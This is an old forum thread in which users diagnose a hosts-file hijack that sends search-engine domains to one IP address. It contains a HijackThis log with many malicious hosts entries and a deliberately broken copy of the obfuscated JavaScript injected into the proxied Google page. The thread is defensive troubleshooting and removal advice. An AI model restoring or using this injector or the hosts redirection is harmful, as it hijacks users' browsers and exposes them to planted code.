First post....I think the virus is with iexplore.exe. I scan my computer with norton,Trend Micro - Free online virus Scan. So far i cant find the virus. Also i cant start my computer up in normal mode it well only start in save mode. Also the iexplorer.exe use almost all my CPU. Anyone have any ideas on how i can fix this. It would really help me....

Logfile of HijackThis v1.97.2
Scan saved at 5:00:20 PM, on 9/14/2003
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Garrett\Local Settings\Temp\Temporary Directory 1 for hijackthis.zip\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.techtv.com/techtv/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
O1 - Hosts: 127.127.127.127 elite
O1 - Hosts: 64.191.95.139 www.google.com
O1 - Hosts: 64.191.95.139 google.com
O1 - Hosts: 64.191.95.139 www.altavista.com
O1 - Hosts: 64.191.95.139 altavista.com
O1 - Hosts: 64.191.95.139 search.yahoo.com
O1 - Hosts: 64.191.95.139 uk.search.yahoo.com
O1 - Hosts: 64.191.95.139 ca.search.yahoo.com
O1 - Hosts: 64.191.95.139 jp.search.yahoo.com
O1 - Hosts: 64.191.95.139 au.search.yahoo.com
O1 - Hosts: 64.191.95.139 de.search.yahoo.com
O1 - Hosts: 64.191.95.139 search.yahoo.co.jp
O1 - Hosts: 64.191.95.139 www.lycos.de
O1 - Hosts: 64.191.95.139 www.lycos.ca
O1 - Hosts: 64.191.95.139 www.lycos.jp
O1 - Hosts: 64.191.95.139 www.lycos.co.jp
O1 - Hosts: 64.191.95.139 alltheweb.com
O1 - Hosts: 64.191.95.139 web.ask.com
O1 - Hosts: 64.191.95.139 ask.com
O1 - Hosts: 64.191.95.139 www.ask.com
O1 - Hosts: 64.191.95.139 www.teoma.com
O1 - Hosts: 64.191.95.139 search.aol.com
O1 - Hosts: 64.191.95.139 www.looksmart.com
O1 - Hosts: 64.191.95.139 search.msn.com
O1 - Hosts: 64.191.95.139 ca.search.msn.com
O1 - Hosts: 64.191.95.139 fr.ca.search.msn.com
O1 - Hosts: 64.191.95.139 search.fr.msn.be
O1 - Hosts: 64.191.95.139 search.fr.msn.ch
O1 - Hosts: 64.191.95.139 search.latam.yupimsn.com
O1 - Hosts: 64.191.95.139 search.msn.at
O1 - Hosts: 64.191.95.139 search.msn.be
O1 - Hosts: 64.191.95.139 search.msn.ch
O1 - Hosts: 64.191.95.139 search.msn.co.in
O1 - Hosts: 64.191.95.139 search.msn.co.jp
O1 - Hosts: 64.191.95.139 search.msn.co.kr
O1 - Hosts: 64.191.95.139 search.msn.com.br
O1 - Hosts: 64.191.95.139 search.msn.com.hk
O1 - Hosts: 64.191.95.139 search.msn.com.my
O1 - Hosts: 64.191.95.139 search.msn.com.sg
O1 - Hosts: 64.191.95.139 search.msn.com.tw
O1 - Hosts: 64.191.95.139 search.msn.co.za
O1 - Hosts: 64.191.95.139 search.msn.de
O1 - Hosts: 64.191.95.139 search.msn.dk
O1 - Hosts: 64.191.95.139 search.msn.es
O1 - Hosts: 64.191.95.139 search.msn.fi
O1 - Hosts: 64.191.95.139 search.msn.fr
O1 - Hosts: 64.191.95.139 search.msn.it
O1 - Hosts: 64.191.95.139 search.msn.nl
O1 - Hosts: 64.191.95.139 search.msn.no
O1 - Hosts: 64.191.95.139 search.msn.se
O1 - Hosts: 64.191.95.139 search.ninemsn.com.au
O1 - Hosts: 64.191.95.139 search.t1msn.com.mx
O1 - Hosts: 64.191.95.139 search.xtramsn.co.nz
O1 - Hosts: 64.191.95.139 search.yupimsn.com
O1 - Hosts: 64.191.95.139 uk.search.msn.com
O1 - Hosts: 64.191.95.139 search.lycos.com
O1 - Hosts: 64.191.95.139 www.lycos.com
O1 - Hosts: 64.191.95.139 www.google.ca
O1 - Hosts: 64.191.95.139 google.ca
O1 - Hosts: 64.191.95.139 www.google.uk
O1 - Hosts: 64.191.95.139 www.google.co.uk
O1 - Hosts: 64.191.95.139 www.google.com.au
O1 - Hosts: 64.191.95.139 www.google.co.jp
O1 - Hosts: 64.191.95.139 www.google.jp
O1 - Hosts: 64.191.95.139 www.google.at
O1 - Hosts: 64.191.95.139 www.google.be
O1 - Hosts: 64.191.95.139 www.google.ch
O1 - Hosts: 64.191.95.139 www.google.de
O1 - Hosts: 64.191.95.139 www.google.dk
O1 - Hosts: 64.191.95.139 www.google.fi
O1 - Hosts: 64.191.95.139 www.google.fr
O1 - Hosts: 64.191.95.139 www.google.com.gr
O1 - Hosts: 64.191.95.139 www.google.com.hk
O1 - Hosts: 64.191.95.139 www.google.ie
O1 - Hosts: 64.191.95.139 www.google.co.il
O1 - Hosts: 64.191.95.139 www.google.it
O1 - Hosts: 64.191.95.139 www.google.co.kr
O1 - Hosts: 64.191.95.139 www.google.com.mx
O1 - Hosts: 64.191.95.139 www.google.nl
O1 - Hosts: 64.191.95.139 www.google.co.nz
O1 - Hosts: 64.191.95.139 www.google.pl
O1 - Hosts: 64.191.95.139 www.google.pt
O1 - Hosts: 64.191.95.139 www.google.com.ru
O1 - Hosts: 64.191.95.139 www.google.com.sg
O1 - Hosts: 64.191.95.139 www.google.co.th
O1 - Hosts: 64.191.95.139 www.google.com.tr
O1 - Hosts: 64.191.95.139 www.google.com.tw
O1 - Hosts: 64.191.95.139 google.at
O1 - Hosts: 64.191.95.139 google.be
O1 - Hosts: 64.191.95.139 google.de
O1 - Hosts: 64.191.95.139 google.dk
O1 - Hosts: 64.191.95.139 google.fi
O1 - Hosts: 64.191.95.139 google.fr
O1 - Hosts: 64.191.95.139 google.com.hk
O1 - Hosts: 64.191.95.139 google.ie
O1 - Hosts: 64.191.95.139 google.co.il
O1 - Hosts: 64.191.95.139 google.it
O1 - Hosts: 64.191.95.139 google.co.kr
O1 - Hosts: 64.191.95.139 google.com.mx
O1 - Hosts: 64.191.95.139 google.nl
O1 - Hosts: 64.191.95.139 google.co.nz
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\MICROS~1\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/0fb5e03023def1/housecall.antivirus.com/housecall/xscan53.cab
O16 - DPF: {78AF2F24-A9C3-11D3-BF8C-0060B0FCC122} (AcDcToday Control) - file://D:\Program Files\AutoCAD 2002\AcDcToday.ocx
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37858.6962384259
O16 - DPF: {AE563720-B4F5-11D4-A415-00108302FDFD} (NOXLATE-BANR) - file://D:\Program Files\AutoCAD 2002\InstBanr.ocx
O16 - DPF: {C6637286-300D-11D4-AE0A-0010830243BD} (InstaFred) - file://D:\Program Files\AutoCAD 2002\InstFred.ocx
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {F281A59C-7B65-11D3-8617-0010830243BD} (AcPreview Control) - file://D:\Program Files\AutoCAD 2002\AcPreview.ocx
O17 - HKLM\System\CCS\Services\Tcpip\..\{559522F2-A4B2-49B5-B328-2BF52300E634}: NameServer = 68.111.16.30,68.1.208.30

Garrett Dude, i thought there was like a limit you could type, obvously i was wrong.

run AD-Ware to see if this is a Spyware program.

run Swatit to see if it is a trojan.

if you have MIRC get rid of it

My first NAV log of the script attempt was 9/14/2003 11:12PM.

After finding the url below, I looked in my NAV log and found the above date/time.

The only things I could find created or modified around that time was a modified hosts file like yours and an additional one in [windir], there was an empty hidden directory off \. Their timestamps are 9/14/2003 10:52PM, 20 minutes earlier.

I kept getting the script violation described in the Symantec URL below whenever I went to Google. Google appeared to be fine afterso I supect they were doing some sort of proxying.

Since you would likely hit one of the urls in the hosts file they could plant whatever they wanted.

Seems like it could be used like sobig, a sleeping giant, probably to perform a DDOS or spam.

Check out :
http://securityresponse.symantec.com/avcenter/venc/data/js.exception.exploit.html

Close IE, go to IE settings and clear your local cache. Get rid of the extra hosts file and rid your hosts file of the extraneous entries.

This bit of code was at the bottom of the proxied Google page. Munged a bit so no one gets bit.

<SCRIFT LANGUAGE='JabbaScript'>
var key = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz1029384756><#].:/";
functionallybad hJKm(_message) {
var bTG; var rcH = key.length/2; var _newString = ""; var lk;
for (var x = 0; x < _message.length; x++) { bTG = key.indexOf(_message.charAt(x));
if (bTG > rcH) { lk = bTG - rcH; _newString += key.charAt(34 - lk);} else {
if (key.indexOf(_message.charAt(x)) < 0) {_newString += _message.charAt(x);}
else {lk = rcH - bTG; _newString += key.charAt(34 + lk);}}} return (_newString); }
source=hJKm("ct]y7<o 6:o:=\"0oosaAAdFBIgIBEgBfEAsqtvtB0ovw\"DcAt]y7<oD");
document.dontwrite(source);
</scrift>

I found the same thing on my computer..
The hosts file, the extra hosts file,
the extra script on the google page, etc.
Thanks Murray, for the removing instructions, I seem to have removed it.

Any idea how this came in? I don't think I opened any attachments, and I have a firewall up and all the latest windows patches...

Are the anti-virus companies aware of this?

Thanks again.